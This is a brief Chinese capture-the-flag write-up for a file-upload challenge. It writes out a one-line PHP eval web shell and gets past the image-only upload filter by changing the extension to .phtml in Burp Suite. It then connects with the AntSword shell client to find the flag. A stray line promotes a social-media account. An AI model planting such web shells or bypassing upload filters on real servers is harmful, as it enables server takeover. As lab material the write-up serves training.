题目
点进页面,是一个文件上传,能联想到getshell
先尝试随便上传一个文件试试
显示上传的文件以jpg、png、gif结尾的图片
构造一句话木马,再将文件后缀改为jpg
<?php @eval($_POST['1234']);?>显示上传成功,但是显示无法解析成功
根据之前的上传文件之类的题目,这里使用bp抓包后改后缀名为phtml
扫描二维码关注公众号,回复:
16974215 查看本文章
上传成功
尝试一下能不能执行php代码
成功执行phpinfo,使用蚁剑链接
去根目录找flag
